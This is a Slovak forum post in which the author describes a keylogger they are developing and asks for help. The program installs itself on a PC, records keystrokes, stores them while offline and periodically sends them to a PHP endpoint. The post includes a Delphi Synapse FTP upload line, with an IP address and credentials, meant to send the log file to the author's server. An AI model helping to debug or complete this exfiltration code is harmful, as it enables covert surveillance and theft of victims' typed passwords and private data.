no takže má to byť keylogger ktorý som zatial spravil tak že po spustení sa dá do PC a každý časový limit vyšle na internet text čo bolo stlačené...není dávno som tu riešil že aké dlhé môžu byť tie url ďalej aby sa zapisovali v tom php každý zvlášť po riadkoch a tak...ten textový súbor to bude vlastne užívateľské meno a logy...
a ak užívateľ nieje pripojený na net tak sa logy len zaznámenávajú a neodosielajú až pokým sa nepripojí..
no a ten synapse to je celkom dobre už som to pomaly začal študovať myslím že to sa na to úplne hodí...len zatiaľ márne hľadám konkrétne príkazy a funkcie, že ktorá na čo slúži....tak len si pozerám demos a snažím sa to pochopiť...
al ak by niekto vedel o nejakom popise príkazov, procedúr a funkcíí ohľadne synapse...budem mu vďačný
//autoeditácia príspevku ( 08 Aug 2009, 13:59 )
no takže našiel som čo som potreboval synapse je veľmi dobrá vec

len tak ma napadlo keď som našiel vo funkciách že odosielanie súboru na ftp....neviem či je to vhodné riešenie...to by bola prvá otázka...ak nie tak by som poprosil aj zdôvodniť...a skúšal som to spísať:
Kód: Vybrať všetko
if ftpputfile('88.86.103.244','21','C:\aa.txt','aa2.txt','feromakovi.tym.sk','heslo') then showmessage('dobre')
else showmessage('sračka');
ale nefunguje mi to...vidíte niekde chybu??...to '21' to je port neviem či je to správne to som len opísal z netu z examplov a tá IP to som dal
www.ic.cz čiže miesto kde mám ftp cez ping do CMD a vypísalo mi tú IP takžee myslím že by to malo byť dobre..viete poradiť??